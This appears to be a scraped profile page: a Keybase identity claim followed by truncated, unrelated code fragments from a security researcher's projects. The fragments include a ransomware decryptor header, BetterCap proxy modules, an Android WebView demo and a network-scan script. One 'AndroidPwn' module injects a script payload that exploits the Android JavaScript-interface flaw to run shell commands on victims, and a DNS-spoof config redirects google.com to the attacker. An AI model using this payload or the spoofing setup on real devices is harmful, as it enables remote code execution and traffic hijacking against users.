I hereby claim:
- I am evilsocket on github.
- I am evilsocket (https://keybase.io/evilsocket) on keybase.
- I have a public key ASDQOex7WfTVV8cumbapyzHyv-NXXay_D0-RfJwOH8xKrQo
To claim this, I am signing this object:
/*
 * This tool will decrypt files encrypted by the Magniber ransomware with
 * AES128 ( CBC mode ) algorithm.
 *
 * RE and report by MalwareBytes ( @hasherezade )
 *
 * https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/
 *
 * Decryptor written by Simone 'evilsocket' Margaritelli
 *

package main
import (
    "encoding/json"
    "fmt"
    "io/ioutil"
    "math/rand"
    "net/http"
    "net/url"
    "strings"

class Example < BetterCap::Proxy::TCP::Module
  meta(
    'Name' => 'Example',
    'Description' => 'Example TCP proxy module.',
    'Version' => '1.0.0',
    'Author' => "Simone 'evilsocket' Margaritelli",
    'License' => 'GPL3'
  )
  # Received when the victim is sending data to the upstream server.

#!/bin/bash
#
# Periodically scan your network searching for your
# Raspberry Pi board and update your /etc/hosts file
# with its ip address.
#
# Copyleft by Simone 'evilsocket' Margaritelli
# http://www.evilsocket.net
# evilsocket at gmail dot com
#

class AndroidPwn < BetterCap::Proxy::Module
  @@command = nil
  @@payload = "<script>\n" +
              "var command = ['/system/bin/sh','-c','COMMAND_HERE'];\n" +
              "for(i in top) {\n" +
              " try {\n" +
              " top[i].getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(cmd);\n" +
              " break;\n" +
              " }\n" +
              "catch(e) {}\n" +

# Empty lines or lines starting with # will be ignored.
# redirect *.google.com to the attacker ip address
local .*google\.com
# redirect *.microsoft.com to 10.10.10.10
10.10.10.10 .*microsoft\.com

class HackTitle < BetterCap::Proxy::HTTP::Module
  meta(
    'Name' => 'HackTitle',
    'Description' => 'Adds a "!!! HACKED !!!" string to every webpage title.',
    'Version' => '1.0.0',
    'Author' => "Simone 'evilsocket' Margaritelli",
    'License' => 'GPL3'
  )
  # called before the request is performed

public class WebViewGUI extends Activity {
    WebView mWebView;
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        mWebView=new WebView(this);
        mWebView.getSettings().setJavaScriptEnabled(true);
        mWebView.addJavascriptInterface(new JavaScriptInterface(), "jsinterface");
        mWebView.loadUrl("file:///android_asset/www/index.html");
        setContentView(mWebView);
    }